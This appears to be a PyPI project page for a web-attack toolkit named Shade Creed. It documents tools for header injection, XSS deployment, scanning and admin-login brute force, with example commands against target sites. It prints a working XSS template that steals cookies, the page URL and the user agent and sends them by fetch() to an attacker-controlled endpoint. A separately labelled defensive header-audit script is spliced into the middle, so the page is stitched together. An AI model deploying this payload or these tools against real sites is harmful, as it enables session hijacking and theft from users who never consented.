Shade Creed Toolkit
✨ Overview
Shade Creed is a command-line penetration testing toolkit designed for web application assessment. It provides tools to inject custom headers, deploy and test XSS payloads, and scan for common vulnerabilities. Built with modularity in mind, it allows you to dynamically customize and deploy payloads for real-world testing scenarios.
Version: 0.0.4 beta
Author: shade - Sherifdeen Adesola
Platform: Linux / Android & Cross platform compatible
✨ Features
- Custom HTTP/HTTPS header injection (supports multiple methods)
- Dynamic XSS payload creation and deployment
- Lightweight vulnerability scanner
- Quick bruteforce setup
- Proxy support (basic)
📦 Installation
pip install shadecreed
Additional package: cloudflared
Installation:
Android (Termux)
pkg install cloudflared
macOS
brew install cloudflared
Windows
- Visit the official download page: 👉 https://developers.cloudflare.com/cloudflared/install-windows
- Download the latest cloudflared-windows-amd64.exe.
- Rename the downloaded file to cloudflared.exe.
- Move it to a folder like C:\cloudflared.
- Add that folder to your System PATH: open System Properties > Environment Variables; under System variables, find and edit Path; add C:\cloudflared\
- Verify installation: cloudflared --version
Linux distros
Download the latest cloudflared binary:
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
Make it executable:
chmod +x cloudflared-linux-amd64
Move it to a directory in your system PATH:
sudo mv cloudflared-linux-amd64 /usr/local/bin/cloudflared
Verify installation:
cloudflared --version
⚙️ CLI Tools
1. shadecreed
Description:
Main entry point for the framework.
usage: shadecreed [-h] -u URL
Options:
- -h, --help: Show help message and exit
- -u URL, --url URL: Target URL to launch framework
- -v, --version: Display version
2. shadecreed-inject
Description:
Injects custom headers into HTTP(S) requests.
usage: shadecreed-inject [-h] -u URL [-m {GET,POST,PUT,DELETE}] [-s HEADER] [-p PROXY] [-r REDIRECT]
Options:
- -h, --help: Show help message and exit
- -u URL, --url URL: Target URL
- -m, --method {GET,POST,PUT,DELETE}: HTTP method to use (default: GET)
- -s HEADER, --header HEADER: Path to custom headers JSON
- -p PROXY, --proxy PROXY: Proxy in format host:port
- -r REDIRECT, --redirect REDIRECT: true - allow redirect; otherwise do not provide this flag
3. shadecreed-xss
Description:
Customize and deploy XSS payloads to dynamic endpoints.
usage: shadecreed-xss [-h] --url URL [--script SCRIPT] [--endpoint ENDPOINT]
Options:
- -h, --help: Show help message and exit
- --url URL: Target URL
- --script SCRIPT: Path to XSS script template
- --endpoint ENDPOINT: Custom receiving endpoint
4. shadecreed-scan
Description:
Scans a target for vulnerabilities.
usage: shadecreed-scan [-h] --url URL
Options:
- -h, --help: Show help message and exit
- --url URL: Target URL
5. shadecreed-brute
Description:
Run custom brute force on admin login pages.
usage: shadecreed-brute [-h] --url URL --redirect [true]
⚠️ Note: To prevent abuse, it can only attempt 10 passwords.
Options:
- -h, --help: Show help message and exit
- -u, --url: Target URL
- -r, --redirect: [true] - if you intend to allow redirects; otherwise, do not provide this flag.
📂 Example Commands
Run the main framework:
shadecreed -u https://example.com
Inject custom header using POST:
shadecreed-inject -u https://target.com/api -m POST -s headers.json -r true
Deploy custom XSS script:
shadecreed-xss --url https://target.com/page --script payload.js --endpoint https://mycustomendpoint.com/log
Test custom endpoint:
shadecreed-test <Custom_Endpoint>
Scan a site for vulnerabilities:
shadecreed-scan --url https://victim.com
Perform custom bruteforce:
shadecreed-brute --url https://myhome/admin --redirect true
🕷️ Custom XSS Template
You can craft custom XSS scripts using the {{endpoint}} placeholder which will be replaced during deployment:
<script>
  var data = {
    cookies: document.cookie,
    location: window.location.href,
    userAgent: navigator.userAgent
  };
  fetch("{{endpoint}}", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(data)
  });
</script>
Save the above as payload.js and pass it using the --script flag.
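The template above depends on three browser behaviours: an inline script executes, document.cookie is readable, and fetch() may reach another origin. As an added example (not part of Shade Creed), this Node.js script audits response headers for the controls that block each one; the function names and sample headers are constructed for illustration.

```javascript
// Added example (not part of Shade Creed): audit response headers for the
// controls that stop an inline script, a document.cookie read, and a
// cross-origin fetch(). All names and sample headers are constructed.

// Parse a CSP value into { directive: [sources] }, lower-cased for comparison.
function parseCsp(value) {
  const policy = {};
  for (const part of (value || "").split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = sources.map(s => s.toLowerCase());
  }
  return policy;
}

// Return findings; an empty array means all three controls are in place.
function auditHeaders(headers) {
  const findings = [];
  const csp = parseCsp(headers["content-security-policy"]);
  // Inline <script> is blocked only when script-src (or default-src) exists
  // and 'unsafe-inline' is absent or neutralised by a nonce/hash source.
  const scriptSrc = csp["script-src"] || csp["default-src"];
  const hasNonceOrHash = (scriptSrc || []).some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  if (!scriptSrc) findings.push("no script-src: inline script allowed");
  else if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash)
    findings.push("script-src allows 'unsafe-inline'");

  // fetch() destinations are governed by connect-src (fallback: default-src).
  const connectSrc = csp["connect-src"] || csp["default-src"];
  if (!connectSrc) findings.push("no connect-src: fetch() to any origin allowed");
  else if (connectSrc.some(s => ["*", "https:", "http:"].includes(s)))
    findings.push("connect-src allows arbitrary origins");

  // document.cookie exposes every cookie that lacks the HttpOnly attribute.
  for (const cookie of headers["set-cookie"] || []) {
    const [pair, ...attrs] = cookie.split(";").map(s => s.trim());
    if (!attrs.some(a => a.toLowerCase() === "httponly"))
      findings.push(`cookie ${pair.split("=")[0]} lacks HttpOnly`);
  }
  return findings;
}

// Constructed sample responses, not captured from any real site.
const weak = { "set-cookie": ["session=abc123; Path=/; Secure"] };
const hardened = {
  "content-security-policy": "default-src 'self'; script-src 'self'; connect-src 'self'",
  "set-cookie": ["session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"],
};
console.log(auditHeaders(weak));
console.log(auditHeaders(hardened));
```

An empty findings array means the response blocks inline execution, restricts fetch() destinations, and hides its cookies from script.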
⚠️ Disclaimer
Shade Creed is built for educational and authorized security testing only. The developer is not responsible for any misuse or illegal activity.
Good luck pentesting! ✨
File details
Details for the file shadecreed-0.0.4.tar.gz.
File metadata
- Download URL: shadecreed-0.0.4.tar.gz
- Upload date:
- Size: 33.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.4
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | 19f8295007893437834527d295201bd249ef596c719e99dc946666a979718419 |
| MD5 | 48650dedce2da6172750b1eea203f332 |
| BLAKE2b-256 | 7b74fcdcbbe01ee3ed37037b0ff8a9792875c874dbe4f3087684b18c28fe7409 |
File details
Details for the file shadecreed-0.0.4-py3-none-any.whl.
File metadata
- Download URL: shadecreed-0.0.4-py3-none-any.whl
- Upload date:
- Size: 37.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.4
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | c9f8265bfff79928b89e6b0beebd6fc4ece380432f7442084ec1e5a3e9cf1b9b |
| MD5 | 058bf0fd553a50bf1f929bf2f69ec637 |
| BLAKE2b-256 | 0f2b3214075957af1f4bc8ef31e97ce7af0258107d4819ab7eb399676bc7b2b4 |